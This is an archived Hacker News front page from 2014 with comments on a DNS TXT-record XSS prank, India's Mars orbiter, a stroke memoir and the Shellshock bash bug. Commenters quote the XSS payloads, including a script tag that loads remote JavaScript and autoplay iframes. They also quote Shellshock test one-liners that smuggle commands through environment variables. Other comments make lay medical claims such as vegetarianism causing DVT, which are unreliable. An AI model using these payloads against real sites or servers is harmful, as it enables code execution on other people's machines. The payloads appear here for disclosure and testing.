hacker news with inline top comments    .. more ..    25 Sep 2014 Best
home   ask   best   4 years ago   
1
TXT Record XSS
988 points by ryanskidmore  6 days ago   227 comments top 46
1
mrb 6 days ago 12 replies      
I am half serious, but how about making HTML served in TXT records a standard trick for serving small web pages very quickly? There are way fewer network round trips:

  1. DNS query for TXT record for example.com  2. DNS reply with HTML content
Compared with the traditional 7 steps:

  1. DNS query for A record for example.com  2. DNS reply with x.x.x.x  3. TCP SYN to port 80  4. TCP SYN/ACK  5. TCP ACK  6. HTTP GET  7. HTTP reply with HTML content
It would also make the content super-distributed, super-reliable, as DNS servers cache it worldwide (and for free so it would reduce hosting costs :D). Also TXT records can contain more than 255 bytes as long as they are split on multiple strings of 255 bytes in a DNS reply.

Again, I am only half serious, but this is an interesting thought experiment...

Edit: oddtarball: DNSSEC would solve spoofing. And updates should take no longer than the DNS TTL to propagate: the TTL is under your control; you could set it to 60 seconds if you wanted. It is a common, false misconception that many DNS resolvers ignore the TTL. Some large web provider (was it Amazon? I forget) ran an experiment and demonstrated that across tens or hundreds of thousands of clients wordlwide, 99% of them saw DNS updates propagated within X seconds if the TTL was set to X seconds. Only <1% of DNS resolvers were ignoring it.

3
ryan-c 6 days ago 4 replies      
I enumerated all IPv4 PTR records a few years back, and I saw a couple XSS things there as well. If anyone wants to host that data set somewhere, let me know, would be interesting to see what others do with it.

Edit: I found my data and have a grep running on it, will share what turns up.

Edit2: Somewhat less exciting than I remember:

$ fgrep -- '>' *

x.x.101.130.csv:1298607746,155.92.101.130,<hostname>.nebula.msoe.edu.

x.x.110.35.csv:1298587462,41.191.110.35,www.ahnigeria.org\032<http://www.ahnigeria.org/>.

x.x.126.67.csv:1298594206,75.127.126.67,\032>.

x.x.229.74.csv:1298608599,139.78.229.74,<hostname>.suites.osuit.edu.

x.x.39.239.csv:1298594005,129.89.39.239,<hostname>.uits.uwm.edu.

x.x.49.198.csv:1298613894,195.164.49.198,test.str!\@#\$%^&*\(\)}{\":]['><.,end.domain.test.pl.

x.x.49.199.csv:1298613720,195.164.49.199,test.str<hr><br>end.domain.test.pl.

x.x.49.206.csv:1298603066,195.164.49.206,test.str<hr><bR>omain.test.pl.

x.x.88.109.csv:1298606801,95.211.88.109,ilo.>.88.211.95.in-addr.arpa.

4
philip1209 6 days ago 4 replies      
I added FartScroll.js from the Onion to my text records:

http://dig.whois.com.au/dig.php?dom=philipithomas.com&type=A...

5
SEJeff 6 days ago 1 reply      
From any Linux (or probably OS X) workstation / server, you can run the command "host -t TXT jaimehankins.co.uk" ie:

$ host -t TXT jamiehankins.co.uk

;; Truncated, retrying in TCP mode.

jamiehankins.co.uk descriptive text "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"

jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all"

jamiehankins.co.uk descriptive text "<script src='//peniscorp.com/topkek.js'></script>"

jamiehankins.co.uk descriptive text "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"

6
kehrlann 6 days ago 4 replies      
This is hilariousy, but could this potentially be a real threat to anything ?
7
AsakiIssa 6 days ago 2 replies      
Wasn't expecting that at all! Had several tabs opened and was really confused for a few seconds while I tried to find the tab with 'youtube on autoplay'.

Firefox needs to show the 'play' icon for the audio tag.

8
ryanskidmore 5 days ago 1 reply      
Who.is have fixed it now, but you can still see it in action over at archive.org

https://web.archive.org/web/20140918191824/http://who.is/dns...

9
garazy 6 days ago 0 replies      
I've found about 80 TXT records with <script tags in them - most of them look like the person not understanding where to paste a JavaScript snippet over XSS attempts, here's all of them -

http://builtwith.com/script-tags-in-TXT-records.txt

There's a few that are "13h.be/x.js" that look like someone trying this out before.

10
jedberg 6 days ago 1 reply      
Come on people, this is so basic. If you didn't generate the data, don't display it on your web page without filtering it. It blows my mind that this isn't just everyone's default.
11
rbinv 6 days ago 3 replies      
Clever. I didn't get it at first.

Never trust user input.

Edit: See http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehanki... for the actual code.

12
colinbartlett 6 days ago 0 replies      
Bravo, I just embarrassed myself in a very quiet meeting.
13
toddgardner 6 days ago 0 replies      
The most clever exploit of XSS I've ever seen. Beautiful. Bravo.
14
JamieH 6 days ago 0 replies      
Still working here if anyone is yet to see it.

http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....

15
Sanddancer 6 days ago 0 replies      
Given how many whois sites cache results, I wonder how many of them are also vulnerable to SQL injections...
16
kazinator 6 days ago 1 reply      
Since there is very little discussion in the link, pardon me for stating what may be obvious to some, but not necessarily everyone.

The point here is that:

1. DNS TXT records can contain HTML, including scripts and whatever.

2. Domain registrants can publish arbitrary TXT records.

3. TXT records can appear in pages generated by web sites which serve, for instance, as portals for viewing domain registration information, including DNS records such as TXT records.

4. Thus, such sites are vulnerable to perpetrating cross-site-script attacks (XSS) on their visitors if they naively paste the TXT record contents into the surrounding HTML.

5. The victim is the user who executes a query which finds the malicious domain which serves up the malicious TXT record that is interpolated into the displayed results. The user's browser executes the malicious code.

Thus, when you are generating UI markup from pieces, do not trust any data that is pulled from any third-party untrusted sources, including seemingly harmless TXT records.

17
mike-cardwell 6 days ago 0 replies      
A while ago I experimented with adding stuff to the version.bind field in bind. Just updated it:

mike@glue:~$ dig +short chaos txt version.bind @198.211.125.252

"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>"

I put this in my named.conf:

version "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>";

This site is vulnerable:

http://dnscheck.pingdom.com/?domain=grepular.com

Although takes a minute before it kicks in. I did report it to them at the time, but never got a response.

18
elwell 6 days ago 1 reply      
In playing around with this hack, I discovered that Dreamhost doesn't properly escape TXT records in their admin interface when modifying DNS records. I put an iframe in and it shows the box but the src is removed; it also killed the page at that point so I'm unable to remove it...
19
bwy 6 days ago 3 replies      
Wish there was a warning, because I accidentally clicked this link in class just now.
20
0x0 6 days ago 0 replies      
Can it be done with CNAME and SRV records too?
21
Thaxll 6 days ago 2 replies      
It has nothing to to do with TXT record, it's just the website that render html. It could be any source.
22
gsharma 6 days ago 0 replies      
Not sure how Trulia handles input for its usernames, but at one point I was able to do this http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-...
23
js2 6 days ago 0 replies      
All editors should, upon save, put up the following prompt:

"I acknowledge the code just written does not trust its input, under penalty of being whipped by a wet noodle."

But I guess folks would just click through.

Sigh.

24
sidcool 5 days ago 1 reply      
I opened this link on my Android's Chrome browser. The top search text input started wildly convulsing. First I thought the post was about that. But I didn't really get what this is about.
25
sanqui 6 days ago 1 reply      
Looks like the who.is site has patched the exploit up a few minutes ago.
26
gcr 6 days ago 0 replies      
Warning: this page links to (loud!) automatic playing audio.
27
tekknolagi 6 days ago 0 replies      
This is hysterical.
28
homakov 5 days ago 0 replies      
XSS on a shitty website not doing trivial sanitization gets 900 points on HN, oh guys you are disappointing me so much.
29
indielol 6 days ago 0 replies      
Wouldn't this make it super easy for Google to ban (show the security warnings in Chrome) the domains?
30
nerdy 6 days ago 0 replies      
Best POC ever.
31
_RPM 6 days ago 1 reply      
When I went to the page, it started playing music. I find that very frustrating and annoying.
32
bdpuk 6 days ago 0 replies      
I've seen similar examples with HTTP headers and sites that display those, nice angle.
33
general_failure 6 days ago 0 replies      
Well played sir, very well played
34
thomasfl 6 days ago 0 replies      
Finally somebody found a way to put html injection on to good use.
35
wqfeng 6 days ago 1 reply      
Could anyone tell me what's about? I just see a DNS page.
36
tedchs 5 days ago 0 replies      
FYI it looks like who.is fixed the XSS bug.
37
ginvok 6 days ago 0 replies      
Aaaand now I'm deaf :)Gotta learn sign language
38
iamwil 6 days ago 3 replies      
How does this work?
39
ing33k 6 days ago 0 replies      
good hack but really stupid of me to click it directly :\
40
PaulSec 6 days ago 0 replies      
I wonder how this got so much points..Reflected XSS in 2014, yeah..
41
himanshuy 6 days ago 1 reply      
What's up with the search box?
42
zobzu 6 days ago 0 replies      
That made me laugh, good one :)
43
notastartup 6 days ago 0 replies      
man...I woke up and got a dose of surprise....love this song.
44
r0m4n0 6 days ago 3 replies      
isn't this technically illegal to demonstrate haha?
45
st3fan 6 days ago 0 replies      
Wonderful!
46
sprkyco 6 days ago 0 replies      
Luckily it does not work on my normal browser: https://www.whitehatsec.com/aviator/
2
ISRO Mars Orbiter Mission: Spacecraft successfully enters Martian Orbit
950 points by skbohra123  1 day ago   140 comments top 42
1
noisy_boy 13 hours ago 4 replies      
People who keep making the (nonsense) point of space vs. better roads keep harping on how the money will be better spent on infrastructure.

I looked up the Indian planning commission's budget for 2013-14 road development. Planning Commission provided an annual outlay of Rs.37,300.00 Crore for 2013-2014 for development in road sector[1]. That is more than 6 billion USD - just for improving roads, for a year.

The budget of the Mars Orbiter mission was around 75 million USD[2] i.e. less than 1.5% of [1].

[1]: http://www.performance.gov.in/sites/default/files/department...

[2]: http://www.forbes.com/sites/saritharai/2013/11/07/how-indias...

2
sidcool 22 hours ago 6 replies      
I remember when in 2012, the then PM of India had declared this project. The entire internet community came together to deride this, saying it's not possible in a couple of years and that India had better feed its hungry etc.

I am a very proud Indian today. This achievement, like other by humanity (LHC in particular), will encourage me to push myself towards greatness.

3
suprgeek 1 day ago 4 replies      
What is even more commendable is that it was done pretty cheaply [1]. Granted the capabilities of some of the other craft are different - but not THAT different.Add to this the fact that this was a success in the first shot - getting a craft from the Earth to to Mars Orbit correctly in one shot on a meager budget is indeed a stunning success for ISRO.

[1] https://twitter.com/WSJIndia/status/514591179363864578/photo...

4
swatkat 1 day ago 2 replies      
MOM spacecraft was launched last year (5th Nov 2013) and today it entered into Martian orbit. Here's the twitter handle of spacecraft: https://twitter.com/MarsOrbiter

Mars Orbit Insertion was covered live on ISRO webcast (http://webcast.isro.gov.in/), Doordarshan National TV and other channels. Here's the complete coverage of MOI: https://www.youtube.com/watch?v=VZL_Vwy0JqI

MOI sequence of events: http://spaceflightnow.com/mars/mom/status.html

MOM carries five scientific payloads: http://www.isro.org/mars/payload.aspx

Expecting first set of colour pictures from MOM by today evening (IST) :)

5
realrocker 1 day ago 2 replies      
Not only did Mom reach Mars, she also got a pretty good bargain on it. So Indian :)
6
SoulMan 23 hours ago 3 replies      
Given that HN is a more intellectual and educated group and there are no one here who is criticizing about the money spent . But the were skeptics who did criticize initially . It basically represents the sample of the population who probably never understood the meaning of space exploration. Most of them are partially educated or educated with a faulty system. It does not just apply to India, there are people sitting in US congress who thinks NASA is waste of money. Same people would have blamed ISRO for INSAT , GSLV & PSLV back in the days where there were bunch of satellite already doing the similar work. Its only because of those ISRO efforts today we have own geo-censing and satellite communication without having to buy from external agencies or compromise our security .
7
corford 13 hours ago 0 replies      
Successful Mars orbit for 0.42% of the price Facebook paid for Whatsapp.

Awesome job and glad ISRO doesn't seem to suffer from the same bad luck the Russians do when it comes to Mars!

8
pdevr 1 day ago 1 reply      
Twitter handle of ISRO's Mars Orbiter: https://twitter.com/MarsOrbiter

First tweet:"What is red, is a planet and is the focus of my orbit?"

9
gordon_freeman 23 hours ago 1 reply      
Great news for India's space program especially considering INR4.54 billion (US$74 million) cost for an interplanetary mission like this, it should be a crash course in frugal space engineering. I really believe ISRO can form a close partnership with NASA in future to launch supply to ISS and much more.
10
vs4vijay 22 hours ago 2 replies      
Hollywood movie Gravity costs more than this space mission.
11
roywiggins 13 hours ago 0 replies      
This is massively inspiring. Huge PR boon for India, and they obviously deserve it.

Super happy about this. Welcome to the interplanetary club!

12
zkirill 1 day ago 2 replies      
It is so incredibly inspiring to listen to a PM speak about space, science, research and exploration for more than an hour. Does anyone know if this is broadcast on Indian national TV?
13
nitin_flanker 22 hours ago 2 replies      
I really want that people around the world should stop saying that this is a cheap mission. Instead you can say that this one is economical mission.

Saying it cheap is derogatory remark. ISRO was thrifty while spending funds on this mission.

14
r0muald 8 hours ago 0 replies      
I didn't see anyone compare this success at first attempt with the (partial) failure of Jade Rabbit https://news.ycombinator.com/item?id=7226307 however that seems a more interesting comparison between newcomers to space exploration rather than, say, NASA missions.
16
bharath28 13 hours ago 0 replies      
Respect. For sheer aplomb & perseverance. It is moments like these that make me want to put my head down and march on no matter what.
17
kjs3 11 hours ago 0 replies      
Congrats, India. Welcome to the club. Hopefully you'll have many more successes.
18
prithvitheprime 20 hours ago 0 replies      
It was lowest priced spacecraft ever sent to Mars; Congrats India (big move on creating low priced space shuttles)
19
chdir 14 hours ago 0 replies      
Previous discussion on the budget : https://news.ycombinator.com/item?id=7964261
20
girvo 23 hours ago 0 replies      
What an amazing achievement! And what a retro looking website! Congrats to the team, this is something to be proud of.
21
murukesh_s 21 hours ago 1 reply      
NASA - Do you want to Outsource? ;-)
22
alphakappa 1 day ago 0 replies      
The odds were against them, and yet they managed to pull this off on the first try. Congratulations ISRO!http://www.bbc.com/news/world-asia-india-29307123
23
return0 17 hours ago 0 replies      
I 'm surprised it's not discussed here ... but the ones who should be worried here is SpaceX, not NASA.
24
nmridul 1 day ago 0 replies      
Title should be "India's mars orbiter ..... "
25
lmm 20 hours ago 0 replies      
Does anyone maintain an up-to-date version of the Mars Scorecard? What's Earth's average for this decade?
26
skbohra123 1 day ago 0 replies      
Webcast of the event can be seen here http://webcast.isro.gov.in/
27
mukundmr 21 hours ago 0 replies      
I hope events like this will help rekindle the interest in science and that ISRO gets a budget boost.
28
jamesmalvi 21 hours ago 0 replies      
Proud to be indian.. Well Done India... I hope we get the best out of this trip
30
gude 13 hours ago 0 replies      
That's one giant interplanetary leap for India
31
bane 1 day ago 0 replies      
Absolutely amazing, congratulations India!
32
pranayairan 19 hours ago 0 replies      
Awesome achievement, go go go.
33
kamakazizuru 18 hours ago 0 replies      
cue haters talking about lack of toilets/education/too much rape/other random social issue that exists in India they heard about that one time in the news - and how India should fix that instead of developing technology...in 5..4..3..2..1
34
shashikant52004 23 hours ago 0 replies      
Congrats team india!!!
35
gauthamilango 20 hours ago 0 replies      
Congrats ISRO!!!!!
36
arc_of_descent 21 hours ago 0 replies      
Congratulations!
37
nagarch 22 hours ago 0 replies      
Simply Amazing...
38
jpatel3 1 day ago 0 replies      
Its a proud moment!
39
digifire 20 hours ago 0 replies      
I just wish ISRO was a privately held like spacex and giving it a run for its money. You would get the students in India really inspired to learn real engineering.
40
general_failure 23 hours ago 0 replies      
Congrats India!

In other news, http://isro.gov.in/ has a <blink> tag :) Some parts of ISRO aren't catching up with technology :))

41
jacko0 17 hours ago 2 replies      
Well Done! But $74 Million could have been spent giving toilets to Indians, so that don't have to shit in the streets.
42
seesomesense 21 hours ago 0 replies      
Good practice for ICBM development.

India's current IRBMs can target all of China.The goal is to be able to target all of the mainland United States.

3
I Had a Stroke at 33
596 points by Thevet  3 days ago   151 comments top 30
1
ohquu 3 days ago 2 replies      
What a beautiful article.

My girlfriend had three strokes, in succession, two years ago (when she was 22). The night before these strokes occurred, she had a transient ischemic attack (TIA). She began speaking gibberish to her friends. She texted me later that night explaining what happened. Her friends had laughed about it because they thought she was just acting like a goofball. I had no idea these were signs of a TIA, but I told her that if it happened again she needed to go to the doctor immediately.

The next day, the right side of her body went numb. This time, she was around people who noticed something was wrong, and she was immediately rushed to the emergency room. By the next day, I had flown a thousand miles (from the location of my new job) to be with her. She couldn't remember many words. She couldn't read a clock. She did not know the answer to 3 + 0.

It turned out that, similar to the author of this article, clots had traveled through the hole in her heart and up to her brain. Luckily, she recovered fully and was back to her old self within about a month. She had surgery to fix the PFO a couple months later. The neurologist told her that nine times out of ten, the clot travels a different path, and the victim is left dead or braindead. I am so lucky. Writing about this has me in big tears.

I am going to stop writing and go hug her now.

2
weddpros 3 days ago 5 replies      
I was 32 when I had a stroke (March 4th, 2003). It was a different kind of stroke, affecting a different part of my brain, essentially related to vision. I was half blind, but I only realized something was "strange" when I saw myself in the mirror: I had only one eye. My brain knew I should have two: I was half blind.

The first diagnosis was migraine with aura (blindness in my case). But the aura should have lasted no more than an hour. Two days later, the aura (blindness) was still there (a sign of infarct but my doctor didn't know it).

I spent 2 days alone in the dark. I forgot to eat but I knew I had to call a taxi to take me to the hospital. I wasn't scared, I though it was just a migraine. It really looked and felt like my usual migraines. So my doctor had me take anti-migraine pills, which are vasoconstrictors. That might have caused the actual stroke: extreme vasoconstriction. Never take anti-migraine treatment during the aura. Never.

It took 2 days before I was diagnosed at the hospital, but they just told me "I see a shadow on the CT scan"... so I spent the next 2 days wondering what kind of shadow? stroke or cancer? And no, I didn't think about asking.

It took one week to be hospitalized for 10 days (my mother called the hospital, harassed them until she could talk to a doctor, who said it was an emergency... one week after the stroke).

It took 15 days before I woke up in the morning and thought "Wow! WOW! I'm back now!". Before that, I spent most of my time sleeping, reading half a page between two naps. I was sleeping more than I was awake.

It took 3 months before I could look at everything I wanted. Before that, looking at trees (and other complex objects) was "painful", and watching movies was too exhausting (especially action movies). During these 3 months, I recovered from blindness, but not completely. I still have a blind spot in my field of view today.

It took 6 months before my mood was really restored. Before that, I needed a daily nap, lots of soothing music, and no pressure at all.

I took aspirin daily for 3 years, after which my neurologist told me I could stop.

I had a few migraines after that, and even ended under oxygen at the hospital once, but I always recovered within 15 days.

It was 10 years ago, and it changed my life. I quit my job as a developer, spent 2 years wondering what to do next, then became a wedding photographer. In february this year, almost 10 years after, I got a new job as a developer.

I'm back on rails (node.js to be precise :-)

3
tucaz 3 days ago 1 reply      
About 15 years ago my father had a stroke at our house. I was about 12 years old and at home at the time along with my grandmother. We didn't know what was happening. At one second he was okay and in another he was on the floor. It was almost impossible to put him back at the bed even with the help of one of our tenants.

We called my mother at work and the funny thing is that before she came home to take him to the ER he was able to ask for coffee (and drink it) and also to smoke a cigarette.

Moving 15 years forward he's still with us (62 years old) with no movement at all on the left side of his body. Had a heart attack with major surgery, is on more than 15 different medications, has diabetes and a bunch of other "minor problems".

My mother gave up her life to take care of him and everyday is a struggle because of the existing problems prior to the stroke and the ones that came after he became bitter and really mean to those who love and take care of him.

I'm not sure why I wrote about this but I felt like sharing. It's not easy when people don't recover, but for some reason I believe we have to take care of them and do our part.

4
ZeroCoin 3 days ago 1 reply      
>I wandered outside the boundaries of telemetry. They lost my heartbeat. When I returned, they scolded me.

The audacity of health care industry workers (those who should know what a certain disease entails) who place blame on their patients for acting normally is infuriating.

I had kidney stones once at a young age. I remember barely walking into the emergency room one night after they became too painful.

As soon as I arrived, white as a sheet of paper, they asked me a few questions... doped me up on morphine... and managed to "lose" me on a gurney in a hallway somewhere for a few hours until my girlfriend at the time came and found me.

They took xrays I believe and I was free to go with some more painkillers in hand.

Apparently the hospital told me that I was supposed to call them by X date if I wanted any more painkillers.

I called them back about a week after that date had passed, asked for a refill, and was scolded like I was some drug addict just looking for a fix. I think they even hung up on me. How could I be so stupid as to have forgotten a date they told me when I was high as a kite by their own doing? Right.

I ended up passing them without any painkillers which as many of you have probably heard is unbelievably painful.

I understand that it can get monotonous working in a hospital, but with the amount of money they're paid to work there you would hope that they would be required to operate with a little compassion. Considering the fact that many people in a hospital are leaving this world.

What if the author's last memory was that of a person she didn't know berating her for something she wasn't sure she even did?

5
TAM_cmlx 3 days ago 1 reply      
Two years ago this October I was homeless. I would wander around all night for fear of attacks[1] and try to sleep during the day at the university while sitting on a bench or chair. In October the winter shelters had not yet opened here, and it was so cold I feared I would freeze to death. I wandered into ER on a pretext: there was a swelling in my leg, spider bite maybe?

I overheard the intake person talking with someone: "I'm worried about that guy in #68." Why? "He thinks he's got a spider bite, but he's got blood clot written all over him."

I felt pretty good about that; it meant I'd have a place to sleep for a whole night. Then I was suddenly surrounded by 5 or 6 people.

Symptoms, sir?

Sometimes slurred speech, tingling in the extremities, can't spell anymore, confused by the way people talk so _fast_, confused by simple things, excessively paranoid, feels like there's an Ace bandage wrapped around my chest.

You're a junkie. No. You're exclusively vegetarian. No. You're diabetic. No, I've been tested for that. Well, we'll take a blood draw.

I got an ultrasound over my legs -- and they discovered a DVT. Next thing I knew, they'd slapped me in hospital for eight days. I was put on no less than eight medications, the scariest of which was Coumadin (same as Warfarin, I think?) -- scary because they made me watch a video describing it, by which I mean "You follow these instructions to the letter or you gonna die, son." At least that's what it felt like. And I had to sign all kinds of waivers, or something. Two of the residents (very young women) told me that they had had DVT's themselves... possibly as a result of being exclusively vegetarian?

The diagnosis was: Pernicious Anemia. My understanding (which is not to be trusted) is that the myelin sheathing around my nerves has been dissolving for years. Apparently the communicating tissue between the axons in my brain had been going away for quite some time.

I liked this diagnosis because: it's easily treatable; it explains my increasingly weird behavior; I'm not dead from it.

The treatment is: Take B12 every day for the rest of my life.

The highly-abbreviated coda to the story is: My Doctor told I'd had this disease for at least ten years(!); hospital got me a case manager, who got me Disability, Homed, and a Laptop. But it took 2 years or so.

TLDR: Being exclusively vegetarian can cause DVT's

[1]http://www.youtube.com/watch?v=lM6WrqLMJrQ

6
huhtenberg 3 days ago 8 replies      
Remember this -

  You have FOUR HOURS to get a person with a stroke to the emergency. 
If you do, their chances of survival are dramatically higher.

7
patio11 3 days ago 2 replies      
My mother had a stroke. The fallout is very, very hard for the patient and their family.

Diet and exercise are, apparently, the easiest levers you have to control for stroke risk. Trust me: this is the best of all possible reasons to care about those. You do not want to go through it and you do not want your family to go through it. Specifics elided for privacy but suffice it to say that it combined elements of a heart attack, advanced Alzheimer's, and a profound war injury in a compact package that arrived on a normal sunny Tuesday.

8
pragone 3 days ago 0 replies      
Strokes can present in truly any number of ways. The Cincinnati Stroke Scale, often seen in public health campaigns as "FAST", provides three simple, quick assessments that can reliably delineate a majority of strokes. It is the standard for basic EMTs as well. More advanced providers should perform a more comprehensive exam, testing all the cranial nerves (actually usually just II through XII). A more formalized, advanced stroke scale is the NIH stroke scale: http://stroke.nih.gov/documents/NIH_Stroke_Scale.pdf

While there are often some kind of neurologic deficit associated with a stroke, the goal standard is, of course, a CT or CTA that should be administered immediately upon arrival in the ED of a suspected stroke (depending on the presentation of symptoms an exam by a neurologist may occur first).

The symptoms described in this story would absolutely make me think this person was having a stroke if she had verbalized them to someone with my training.

It's also worthwhile to point out that the person having a stroke may not realize they are having a stroke. People may have the obvious symptoms - slurred speech and hemiparesis - and refuse to acknowledge that these problems exist, because, in their mind, they don't.

If you think someone is having a stroke, record the time you first noticed symptoms and call 911 immediately.

9
day_ 3 days ago 0 replies      
Great article.

I had a stroke one night in my 20's. When I woke up, my right side was numb (I thought I just slept on my arm), I spoke gibberish and was unable to write but I felt fine and I thought I spoke perfectly fine. I finally figured out that something was not right when I tried to write a message to my mom on the back of an envelope to tell her that I was fine and I just drew a straight line instead of letters.That's when she called an ambulance.

Luckily I was back to normal within a month, but I struggled for some time to to find the right words when talking.

10
tluyben2 2 days ago 1 reply      
I had a TIA when I was 28 (over 10 years ago) and under heavy stress (high blood pressure; they did not find any other causes; I was healthy as I could be, just extreme stress from my own business at that time); I swore after that to never be stressed again (and took measures to make sure that is possible, like living in southern Spain for large parts of the year) and haven't been since. I even forgot how it felt. My life is so much better that I now thank this TIA. Stress is pure hell and whatever business people think they get out of it; it's bullshit IMHO; I have had way more business success than ever without stress than I had with.
11
alexitosrv 3 days ago 0 replies      
Four weeks ago my girlfriend, 32 yo, had a brain stroke because a deep venous thrombosis at her left side of the head. It was intense to see how much she deteriorated in the course of just a few hours, starting with a seizure and some very acute headaches she had together with vomiting the previous days. We were in intensive care around 10 days, and then 3 days more in hospitalization. The investigation of her tendency to hypercoagulate yielded as main culprit sedentarism and the previous uninterrupted usage of oral contraceptives (mercilon) for almost ten years. We were fortunate in some sense as the cause was easy to point out and also as we discarded autoinmuse diaseases (my biggest concern) and now she is under low molecular weight heparin, hoping that the clot is reabsorbed in two or three months.

As part of the recovery, I'm reading to her My Stroke of Hindsight, of Jill Bolte Taylor, and her symptoms and the description of the episode of the acute phase match largely: speech loss, paralysys of her right part of the body and rational disconnect with external stimuli.

This article highlights also how sensible we are to the changes of what we are at the end: physicochemical interactions. I was worried my girlfriend would lose her essence, but thanks to God her recovery has been amazing so far.

12
treehau5 3 days ago 0 replies      
I am not sure if you are the OP or know her, but this story touched my heart. It is beautiful. I am only imagine how strong she has to be, and the people around her must be to get through this. My sister and her husband are going through the very same thing -- He was progressing very well in his career and they just had their first child when he suffered his from the same reason - a hole in the heart. All the best. You and all the stroke victims have my prayers tonight.
13
pimentel 3 days ago 1 reply      
All the stories I know and heard of stroke victims in their 30's or 40's make me think and ask: is there really a way to prevent or predict a stroke?

Would the "controversial routine full body scan" help? Specially to people who have a parent being an early stroke victim?

These things are scary as hell...

14
skizm 3 days ago 2 replies      
Remember FAST: http://en.wikipedia.org/wiki/FAST_(stroke)

First 3 minutes of the house episode Fetal Position (S3 E17) demonstrate it.

15
Pxtl 2 days ago 1 reply      
> Each night, I took the box of Lovenox syringes and carried it to my husband, sobbing. Its time for my shot, I said, tears streaming down my face.

> Each night, he pinched skin on my belly as I screamed like a toddler and he injected the medicine.

Her husband sounds like an awesome guy - taking care of her in that state sounds incredibly difficult.

> My husband and I decided to get a divorce.

> I think in hindsight, it was your stroke that changed everything for me, he said.

> I thought it was the affair hed had. But maybe he had a point. Maybe that was the year, I said.

Dang.

16
camperman 3 days ago 1 reply      
Her memory experience was already reminding me of Leonard in Memento and then she writes, "it's time for my shot." That hit me unreasonably hard.
17
spindritf 3 days ago 3 replies      
Well, I just popped an Aspirin for no reason.
18
GuiA 3 days ago 3 replies      
Will smartwatches with heart rate/other health sensors be able to detect strokes right when they happen? Or maybe even slightly before they do?
19
glxc 3 days ago 0 replies      
This is an amazing article and incredible blog

Among many interesting and inspiring themes, of interest to the HN community may be the disassociation of vision and objects. All of the deep learning models succeeding in classification emulate one side of the brain, while perspectives like this present life outside the constraint of rational thinking.

20
cell303 3 days ago 0 replies      
I was terrified after reading this. Reminded me that I should live a bit healthier, not drink more coffee then water, got to sleep earlier, wake up earlier, maybe even exercise. But more important, it got me thinking. The non-routine kind of thinking. Read some old diary entries. Wrote a new one, after almost a year.
21
jlavarj 2 days ago 0 replies      
My wife had a stroke at the age of 30, seven years ago. It happened in the hospital during an embolization procedure. She was unconscious for 5 days. This event has obviously changed her life, but I wasn't prepared for the ways it would change mine. Thank you for sharing this.
23
taybin 2 days ago 0 replies      
This was on buzzfeed?? Crazy. Didn't think those soul-less bottom-feeders would turn to quality long-form essays.
24
delackner 2 days ago 0 replies      
Profound. Thank you for sharing this. It pains me to read though that you had years of abnormal symptoms (severe shortness of breath, migraines, etc) and the medical system was unable to detect the issue early. This seems like the sort of issue that early detection could provide tremendous quality of life / survivability improvements at little risk. If the existing tests are too difficult, then we need more tests.
25
yousifa 2 days ago 0 replies      
This is the best piece I have read in a while. It is amazing how something so small could affect our life. We are so delicate. Do you actually see objects as shapes and colors (as in, was the part of the brain that translates the signal into images lost) or was that you can not figure out what it is that you are looking at?
26
dgorges 2 days ago 0 replies      
There is a similar TED Talk worth watching:

Jill Bolte Taylor:My stroke of insight

http://www.ted.com/talks/jill_bolte_taylor_s_powerful_stroke... 18:19 min, Feb 2008)

27
nikant 2 days ago 0 replies      
Such a well written article. I loved the details with which the incident was described.
28
bshimmin 3 days ago 3 replies      
I wish Buzzfeed only had articles like this.
29
diestl 3 days ago 4 replies      
Not sure what this has got to do with programming?
30
ozy23378 2 days ago 3 replies      
> As a result, my left brain, the expert at numbers and language and logic and reasoning, a part of it suffocated and died. My right brain, the specialist with regard to color, music, creativity, intuition, and emotions, therefore could not talk to my left brain.

This popular myth of broad specialization of the hemispheres needs to die. The author lost credibility there.

4
CVE-2014-6271: Remote code execution through bash
762 points by vault_  13 hours ago   369 comments top 60
1
daveloyall 4 hours ago 1 reply      
There's some misunderstanding of how the one-liner works, so here's a writeup.

You can break the one-liner into two lines to see what is happening.

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"    3. bash: warning: badvar: ignoring function definition attempt    4. bash: error importing function definition for `badvar'    5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

And now the same two input lines on and OLD bash:

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"    3. vulnerable    4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)

2
andrew13 2 hours ago 5 replies      
It might still be an issue. The patches may not have done enough.

$ env X='() { (a)=>\' sh -c "echo date"; cat echo

https://twitter.com/taviso/status/514887394294652929#

env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

3
jimrandomh 12 hours ago 3 replies      
If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.
4
jingo 17 minutes ago 0 replies      
A quick fix would be to stop using bash.

I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.

There's no reason webservers have to use bash by default.

Sysadmins might need a hefty shell will lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.

